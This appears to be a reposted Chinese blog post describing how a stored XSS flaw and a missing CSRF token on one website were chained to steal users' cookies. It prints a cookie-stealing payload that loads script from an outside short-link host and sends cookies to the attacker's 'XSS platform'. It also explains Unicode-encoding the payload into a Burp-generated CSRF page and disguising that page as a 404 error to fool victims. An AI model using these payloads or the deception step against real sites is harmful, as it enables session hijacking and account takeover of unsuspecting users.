一次csrf配合xss的攻击实例

xss出现在我的邮箱处

alert of payload

"><script>alert(/test/)</script><"

by cookie of payload

"><script src=http://t.cn/RxQ4lz8></script><"

csrf依旧是出现在“我的资料”这里,我们进行抓包

由此我们可以从中看到并没有验证token

那么我们生成poc(burpsuite可以直接生成)

得到poc如下图:

 

 

打红勾的地方即为刚才存在xss漏洞的地方也是csrf漏洞的所在地。

我们将value值换成我们的xss 打cookie的 payload"><script src=http://t.cn/RxQ4lz8></script><"

 此时如果我们直接将这个payload插入到value值当中定然会被当作html代码,就扰乱了poc的html代码。我们需要对其进行一个转码。我们可以采用unicode进行编码一下绕过这个问题。

当对方打开这个poc的时候cookie就自动跑到我们的xss 平台了。

我们可以将poc放到某个网站下面,然后把poc写成404,让被攻击打开误以为是错误页面。

 

转载于:https://www.cnblogs.com/xishaonian/p/6557769.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值